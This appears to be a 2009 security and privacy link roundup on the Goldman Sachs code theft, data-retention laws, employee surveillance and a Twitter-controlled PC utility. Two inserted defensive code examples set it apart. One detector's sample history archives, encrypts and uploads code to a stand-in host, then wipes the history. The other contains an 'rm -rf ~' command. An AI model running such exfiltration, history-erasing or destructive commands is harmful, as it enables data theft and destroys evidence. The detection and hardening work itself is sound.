Monday, July 06, 2009

How big is this one? Too complex (or too scary) for network news?

http://developers.slashdot.org/story/09/07/06/0353217/Goldman-Sachs-Trading-Source-Code-In-the-Wild?from=rss

Goldman Sachs Trading Source Code In the Wild?

Posted by ScuttleMonkey on Monday July 06, @08:31AM from the bunny-ball-ball dept. business court

Hangtime writes

"The world's most valuable source code could be in the wild. According to a report by Reuters, a Russian immigrant and former Goldman Sachs developer named Sergey Aleynikov was picked up at Newark Airport on July 4th by the FBI on charges of industrial espionage. According to the complaint, Sergey, prior to his early June exit from Goldman, copied, encrypted, and uploaded source code inferred to be the code used by Goldman Sachs to process in real time (microseconds) trades between multiple equity and commodity platforms. While he was trying to cover his tracks, the system backed up a series of bash commands, so he was unable to erase the history that would later give him away to Goldman and the authorities. So the question: where are the 32MB of encrypted files that Sergey uploaded to a German server?"

[From the ZeroHedge article:

This week's NYSE Program Trading report was very odd: not only because program trading hit 48.6% of all NYSE trading, a record high at least since the NYSE has kept tabs on this data, and a data point which in itself was startling enough to cause some serious red flags as I jaunt from village to village in what little is left of Europe's bison country, but what was shocking was the disappearance of the #1 mainstay of complete trading domination (i.e., Goldman Sachs) from not just the aforementioned #1 spot, but the entire complete list. In other words: Goldman went from 1st to N/A in one week.

… Another major question: do Goldman and the NYSE not have a fiduciary responsibility to announce to both shareholders and any interested parties if there has been a major security breach in their trading operations? Certainly this seems like a material piece of information: given that program trading accounted for 49% of all NYSE trading last week, and Goldman as recently as one week ago represented about 60% of all principal program trading, will this be called an issue threatening the National Security of the United States? Shouldn't all market participants be aware that there is some rogue code in cyberspace that can be abused by the highest bidder, who very likely will not be interested in proving the efficient market hypothesis?

… The complete affidavit can be downloaded from this post here
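The detail worth keeping from the story above is the mechanical one: the shell history was backed up off the workstation, so clearing it locally left the record intact for the investigators. What follows is an added example, not code from the Slashdot post, Reuters or the complaint, and it describes no specific real incident. It scans a saved shell history for two things an incident responder would look for: commands that clear or disable the history itself, and a copy, encrypt, upload sequence within one session. The history lines are constructed for the example; the patterns are generic and the stage keywords (tar, openssl enc, scp and so on) are illustrative, not a complete list.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Commands that clear, disable, or delete the shell history. Seeing any of
# these in a centrally backed-up copy is itself the finding: the user wanted
# the local record gone.
HISTORY_TAMPERING = [
    r"\bhistory\s+-c\b",                                    # wipe in-memory history
    r"\bunset\s+HISTFILE\b",                                # stop writing history at all
    r"\b(export\s+)?HIST(FILE)?SIZE=0\b",                   # truncate history to nothing
    r"\brm\s+(-\S+\s+)*\S*\.(bash_|zsh_)?history\b",        # delete the history file
    r"\bshred\b.*\.(bash_|zsh_)?history\b",                 # overwrite the history file
    r"\bln\s+-sf?\s+/dev/null\s+\S*\.(bash_|zsh_)?history\b",  # point it at /dev/null
]

# Stages of an exfiltration chain. Any one of these is normal on its own;
# all three, in this order, inside one session is what deserves a look.
STAGE_ORDER = ["archive", "encrypt", "upload"]
STAGES = {
    "archive": r"\b(tar|zip|7z)\b",
    "encrypt": r"\b(gpg|openssl\s+enc|ccrypt)\b",
    "upload":  r"\b(scp|sftp|rsync|ftp|curl\s+(-T|--upload-file))\b",
}


def scan_history(lines: Iterable[str]) -> Dict[str, object]:
    """Report tampering commands and exfil stages found in a shell history."""
    tampering: List[str] = []
    first_seen: Dict[str, Tuple[int, str]] = {}   # stage -> (line index, command)
    for idx, raw in enumerate(lines):
        cmd = raw.strip()
        if not cmd:
            continue
        if any(re.search(p, cmd) for p in HISTORY_TAMPERING):
            tampering.append(cmd)
        for stage, pattern in STAGES.items():
            if stage not in first_seen and re.search(pattern, cmd):
                first_seen[stage] = (idx, cmd)
    # The chain only counts when every stage is present and in order.
    positions = [first_seen[s][0] for s in STAGE_ORDER if s in first_seen]
    chain_complete = len(positions) == len(STAGE_ORDER) and positions == sorted(positions)
    return {
        "tampering": tampering,
        "exfil_stages": {s: c for s, (_, c) in first_seen.items()},
        "exfil_chain_complete": chain_complete,
        "suspicious": bool(tampering) or chain_complete,
    }


# Constructed sample histories (not from any real system).
SAMPLE_HISTORY = """\
cd ~/src/trading-engine
git status
tar czf /tmp/eng.tgz ./src
openssl enc -aes-256-cbc -salt -in /tmp/eng.tgz -out /tmp/eng.tgz.enc
scp /tmp/eng.tgz.enc user@files.example.net:/incoming/
rm -f /tmp/eng.tgz /tmp/eng.tgz.enc
history -c
rm -f ~/.bash_history
""".splitlines()

BENIGN_HISTORY = """\
cd ~/src/trading-engine
make test
tar czf build-artifacts.tgz build/
git log --oneline -5
""".splitlines()


if __name__ == "__main__":
    for name, hist in (("sample", SAMPLE_HISTORY), ("benign", BENIGN_HISTORY)):
        print(name, scan_history(hist))
```

Run against a real collection, the point is the source of the lines: a history file read off the same workstation is only as trustworthy as the user who could edit it, so feed this from the backed-up or forwarded copy (auditd execve records, a syslog-forwarded history, or an EDR process log), which is exactly what made the erasure attempt visible in the case above.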



Coming soon to a country near you.

http://www.pogowasright.org/?p=1338

New cellphone laws in Zambia

July 5, 2009 by Dissent Filed under Businesses, Govt, Legislation, Non-U.S.

Experts have lambasted new laws to collect information about prepaid cellphone users, citing their “severe” privacy implications.

One academic described existing rules that forced operators to retain personal call data for a minimum of three years as “excessive”.

And as of last Wednesday the government will collect more data. Operators now have to obtain the full name, address and identity number of customers buying SIM cards for prepaid services. MTN, Vodacom and Cell C have been given 18 months to get this information from customers.

Read more in the Pretoria News.

[From the article:

… Charles Goredema, the head of organised crime research at the Institute of Security Studies in Cape Town, said he failed to see "any link between (the legislation) and combating organised crime".

He said the new law "contravened the right to privacy" and that the idea was to widen the amount of information accessible to police with no specific end other than to hoard as much data as possible.

… He also pointed out the confusion that would be caused if users swopped SIM cards en masse. "The system would then have no idea who it is actually tracking. It is, after all, ultimately tracking a SIM, not a person."

… Hosein views the three to five-year period as excessive.

"All the studies have shown that a minimum period of three months tends to be sufficient, with nine months at the maximum, three years is excessive. In fact, any retention period is excessive. Canada, the US, Australia, New Zealand, and a host of other countries have no retention period at all.

"And they all face the same challenges, so why the difference?" [None, but we will eventually point to their laws as justification for similar laws here. Bob]


(Related) We want a law like this one too, don't we?

http://www.livemint.com/2009/07/05204206/Data-protection-amendments-se.html?h=B

Data protection: amendments set the ball rolling on liability

Two of the major sectors of the Indian economy, IT and BPO, have access to personal data, yet there is no express legislation in place to deal with data protection

… Section 43A states that if a “body corporate” possessing, dealing or handling any “sensitive personal data or information” in a computer resource which it owns, controls or operates is negligent in implementing and maintaining “reasonable security practices and procedures”, and thereby causes wrongful loss or wrongful gain to any person, this body corporate will become liable to pay damages as compensation to the affected person.

The term “body corporate” is wide enough to include a company, a firm, sole proprietorship or other association of individuals engaged in professional or commercial activities. Then there is the question of what constitutes “reasonable security practices and procedures”.

… This essentially means that contracting parties could incorporate in their contract the level and extent of the security procedures, practices and protection that the disclosing party desires to put in place in order to protect its sensitive personal information. A breach of such provisions, if falling within the purview of section 43A, could make the receiving party liable to pay damages.


(Related) Takes a bit of reading to understand, but in short, the law is like Swiss cheese...

http://www.databreaches.net/?p=5991

NV’s New Encryption Law Made Moot?

July 6, 2009 by admin Filed under Breach Laws, Commentaries and Analyses, Legislation, State/Local

Rebecca Herold of IT Compliance has a commentary on Nevada’s new encryption law and whether the state’s data breach law makes the encryption law moot. It begins:

On May 30, 2009, Nevada enacted a new law, SB 227, which will basically replace NRS 597.970 in January 2010.

In many ways the new law is an improvement over the much more vague, and brief, NRS 597.970. I want to focus here on an improvement, but something that still leaves much to interpretation; that is, what is meant by “encryption”?

According to NRS 205.4742,

“‘Encryption’ means the use of any protective or disruptive measure, including, without limitation, cryptography, enciphering, encoding or a computer contaminant, to: 1. Prevent, impede, delay or disrupt access to any data, information, image, program, signal or sound; 2. Cause or make any data, information, image, program, signal or sound unintelligible or unusable; or 3. Prevent, impede, delay or disrupt the normal operation or use of any component, device, equipment, system or network.”

Read more on IT Compliance.

[From the article:

So, what's the motivation for organizations to actually use strong encryption if the breach law will not require the organizations to report a breach of PII that is simply scrambled? As the laws are written, an organization with a breach of simply scrambled PII would be liable for damages under SB 227, but according to SB 347 they wouldn't need to report such a breach, so who would know?



Can a technology as simple to use as Facebook seriously compromise security? Sure. But everybody is doing it. The wife shouldn't know anything too sensitive. Better that most of this comes from them than that it just shows up in the tabloids. Pick your favorite excuse...

http://www.pogowasright.org/?p=1319

Spy chief’s family details on Facebook

July 5, 2009 by Dissent Filed under Featured Headlines, Internet, Non-U.S.

The Daily Mail reports that personal and family details of Sir John Sawers, the new head of MI6, were exposed after his wife published intimate photographs and family details on her Facebook page. According to the paper, “Amazingly, she had put virtually no privacy protection on her account, making it visible to any of the site’s 200 million users who chose to be in the open-access ‘London’ network - regardless of where in the world they actually were.” The paper reproduced the photos in their paper after notifying the Foreign Office, who in turn, contacted Facebook to remove the family’s details. The exposed details reportedly included the location of his London residence and the whereabouts of his grown children.

Not everyone thinks this is a big deal in terms of a security breach, though. While The Times calls it a “major security breach,” and the BBC reports that some British politicians are calling the details a security lapse that leaves the incoming MI6 chief vulnerable to blackmail and criticism, others see the incident as no more than mildly embarrassing. The Guardian quotes Foreign Secretary David Miliband as reacting, “It’s not a state secret that he wears Speedo swimming trunks.” “Let’s grow up.”



We love our employees, we just don't trust them.

http://www.pogowasright.org/?p=1342

DSS takes employee monitoring to new level

July 5, 2009 by Dissent Filed under Non-U.S., Surveillance, Workplace

DSS Co Ltd, a Japanese firm that edits and processes digital maps based on survey data, has started a service that records the actions of factory workers over long periods and visualizes them.

The tools used for collecting the data are (1) the “ankle sensor” to be attached to the leg of a worker for recording his or her movement, (2) the “milestone,” which will be installed in various places in the plant to know how long workers stay there and (3) the “small video camera” to be put in the chest pocket of the worker to record his or her action.

Read more and see photos of the devices on Tech-On!. Engadget’s Vladislav Savov comments:

Sure, you might find out Bob in accounting takes a really long lunch, but do you really need to spend $20,000 and piss off your entire workforce to prove that? Just stalk his Tweets and Facebook status updates like a good old-fashioned employer would do.


(Related) Maybe HP snooping on board members' and reporters' phone records wasn't so far outside the norm?

http://www.pogowasright.org/?p=1361

Deutsche Bank spied on employees

July 5, 2009 by Dissent Filed under Businesses, Non-U.S., Surveillance, Workplace

Germany’s biggest bank, Deutsche Bank, hired detectives to spy on its employees including a member of its supervisory board, managers and a shareholder, German magazine Der Spiegel reported.

The bank launched an internal inquiry at the end of May into potential breaches of data privacy law in connection with the affair, Spiegel said in its latest edition to be published Monday.

Chief executive Josef Ackermann promised a “zero tolerance” approach over the affair at an annual general meeting of the bank.

Detectives “kept an eye on the movements of these people, and made inquiries as to who they were meeting and when”, said Spiegel, which had seen a report by a law firm on the matter.

Read more in The Local (de)



Is this even possible?

http://www.pogowasright.org/?p=1384

Barring Internet access for criminals

July 6, 2009 by Dissent Filed under Court, Internet, Legislation, U.S.

Defendants in criminal proceedings have conditions or restrictions imposed on them when granted supervised release. Now, with Internet crimes on the rise, United States (U.S.) courts are imposing a prohibition on accessing the Internet as a condition of supervised release. The prohibition on accessing the Internet may be imposed as an initial condition or may be added as a modification of supervised release conditions. But is this prohibition legal? And how does it fit the federal sentencing guidelines? All those questions were answered by the IBLS INTERNET LAW specialists at ibls.com.

Read more on Ecommerce Journal.

[From the article:

The prohibition on accessing the Internet fits well with the federal sentencing guidelines' factors enumerated in 18 U.S.C. § 3553(a) when the underlying crime was committed through the use of the Internet.



Everyone should understand this by now – but they don't

http://www.wired.com/techbiz/it/magazine/17-07/mf_freer

Tech Is Too Cheap to Meter: It's Time to Manage for Abundance, Not Scarcity

By Chris Anderson 06.22.09

… All this was possible because Alan Kay, an engineer at Xerox's Palo Alto Research Center in the 1970s, understood what Moore's law was doing to the cost of computing. He decided to do what writer George Gilder calls "wasting transistors." Rather than reserve computing power for core information processing, Kay used outrageous amounts of it for frivolous stuff like drawing cartoons on the screen. Those cartoons—icons, windows, pointers, and animations—became the graphical user interface and eventually the Mac. By 1970s IT standards, Kay had "wasted" computing power. But in doing so he made computers simple enough for all of us to use. And then we changed the world by finding applications for them that the technologists had never dreamed of.

Scarcity vs. Abundance Management

                          Scarcity                                        Abundance
Rules                     Everything is forbidden unless it is permitted  Everything is permitted unless it is forbidden
Social model              Paternalism ("We know what's best")             Egalitarianism ("You know what's best")
Profit plan               Business model                                  We'll figure it out
Decision process          Top-down                                        Bottom-up
Organizational structure  Command and control                             Out of control


(Related)

http://www.wired.com/techbiz/it/magazine/16-03/ff_free

Free! Why $0.00 Is the Future of Business


(Related) But I bet he won't invest in my anti-gravity research...

http://news.cnet.com/8301-19882_3-10279763-250.html?part=rss&subj=news&tag=2547-1_3-0-5

Steve Jurvetson: Only investing in the unknown

by Rafe Needleman July 6, 2009 3:59 AM PDT

Since I started covering start-ups for Red Herring back in 1998, no venture capitalist has entertained me as much, or made me as envious, as Steve Jurvetson of Draper Fisher Jurvetson. He's one of the few real dilettantes in the field, and he actually makes money from a studied lack of focus.

In comparison, most tech VCs, including titans like Vinod Khosla (at Kleiner Perkins) and Marc Andreessen, who just launched a new fund, focus on industry segments or coherent visions for certain markets. Khosla, for example, is a modern industrialist currently investing in companies attached to renewable energy or green products. Andreessen is all about Web start-ups.

Jurvetson? If other people are investing in it, he thinks it's passe.



An interesting business model for my students to explore...

http://news.slashdot.org/story/09/07/05/1546214/We-Rent-Movies-So-Why-Not-Textbooks?from=rss

We Rent Movies, So Why Not Textbooks?

Posted by Soulskill on Sunday July 05, @12:26PM from the or-food dept. education

Hugh Pickens writes

"Using Netflix as a business model, Osman Rashid and Aayush Phumbhra founded Chegg, shorthand for 'chicken and egg,' to gather books from sellers at the end of a semester and rent — or sometimes sell — them to other students at the start of a new one. Chegg began renting books in 2007, before it owned any, so when an order came in, its employees would surf the Web to find a cheap copy. They would buy the book using Rashid's American Express card and have it shipped to the student. Eventually, Chegg automated the system. 'People thought we were crazy,' Rashid said. Now, as Chegg prepares for its third academic year in the textbook rental business, the business is growing rapidly. Jim Safka, a former chief executive of Match.com and Ask.com who was recently recruited to run Chegg, said the company's revenue in 2008 was more than $10 million, and this year, Chegg surpassed that in January alone."



A simple suggestion for my hacking students. Take control of remote computers for fun and profit! (Find the answers to the hacking final on my computer and guarantee yourself an “A”)

http://www.labnol.org/software/control-computer-with-email-or-sms/9229/

July 3, 2009

How to Remote Control your Windows PC with Email or SMS

… You first install the free TweetMyPC utility on any Windows PC and associate your Twitter account. The app will silently monitor your Twitter stream every minute for any desktop commands and if it finds one, will act upon it immediately. The initial version of TweetMyPC was limited to basic shutdown and restart commands, however the current v2 has a far more robust set of commands, enabling a far more useful way of getting your PC to carry out certain tasks especially when you’re AFK (Away From Keyboard).
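What the article describes is a command channel over a public feed: the PC polls the stream and acts on whatever it recognises as a command. The security question is who else can write into that stream, and what the PC will do with the text. The following is an added example, not TweetMyPC's code and not a description of how that utility actually parses its commands; the "cmd:" prefix and the field layout are assumptions made for the example, and nothing here talks to Twitter (the feed text is constructed inline). It puts the insecure pattern (treat feed text as a shell command) next to a hardened dispatcher that only accepts an allowlisted action carrying a valid HMAC tag, a fresh timestamp and an unused nonce.

```python
import hashlib
import hmac
from typing import Optional, Set

# The only actions the controller will ever perform: fixed names, never shell.
ALLOWED_ACTIONS = {"shutdown", "restart", "lock", "screenshot"}


def naive_dispatch(feed_text: str) -> Optional[str]:
    """The insecure pattern: whatever follows the trigger word is the command.

    Anyone who can get text into the watched feed (the account owner, someone
    who phished the account, a mention the filter lets through) chooses what
    runs. The command is returned here rather than executed; the real
    anti-pattern would hand it to subprocess.run(cmd, shell=True).
    """
    _, sep, cmd = feed_text.partition("cmd:")
    return cmd.strip() if sep else None


class FeedController:
    """Hardened dispatcher: allowlisted action, HMAC tag, freshness, no replay."""

    def __init__(self, key: bytes, max_skew_s: int = 300):
        self.key = key                # shared secret between sender and PC (assumed)
        self.max_skew_s = max_skew_s  # reject messages older than this many seconds
        self.seen_nonces: Set[str] = set()

    def _tag(self, action: str, ts: int, nonce: str) -> str:
        # Tag covers every field the receiver acts on, so none can be swapped.
        msg = f"{action}|{ts}|{nonce}".encode()
        return hmac.new(self.key, msg, hashlib.sha256).hexdigest()

    def build_command(self, action: str, ts: int, nonce: str) -> str:
        """What the authorised sender posts into the feed."""
        return f"cmd:{action}|{ts}|{nonce}|{self._tag(action, ts, nonce)}"

    def dispatch(self, feed_text: str, now: int) -> Optional[str]:
        """Return the action to perform, or None if the message fails any check."""
        _, sep, payload = feed_text.partition("cmd:")
        if not sep:
            return None
        parts = payload.strip().split("|")
        if len(parts) != 4:
            return None
        action, ts_text, nonce, tag = parts
        if action not in ALLOWED_ACTIONS:              # no arbitrary commands, ever
            return None
        try:
            ts = int(ts_text)
        except ValueError:
            return None
        if abs(now - ts) > self.max_skew_s:             # stale or far-future message
            return None
        if nonce in self.seen_nonces:                   # re-post of a valid message
            return None
        if not hmac.compare_digest(self._tag(action, ts, nonce), tag):  # forged
            return None
        self.seen_nonces.add(nonce)                     # only after the tag verifies
        return action


if __name__ == "__main__":
    ctl = FeedController(b"example-shared-secret")
    msg = ctl.build_command("lock", 1_000_000, "n1")
    print(msg, "->", ctl.dispatch(msg, now=1_000_000))
    print("replay ->", ctl.dispatch(msg, now=1_000_000))
    print("naive  ->", naive_dispatch("please cmd: rm -rf ~"))
```

The ordering in `dispatch` matters: the nonce is recorded only after the tag verifies, so an attacker who can post to the feed cannot burn nonces or trigger anything; the timestamp window bounds how long a captured message stays useful; and because the action is a name looked up in a fixed set, even a leaked key buys the attacker a lock or a restart, not a shell.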
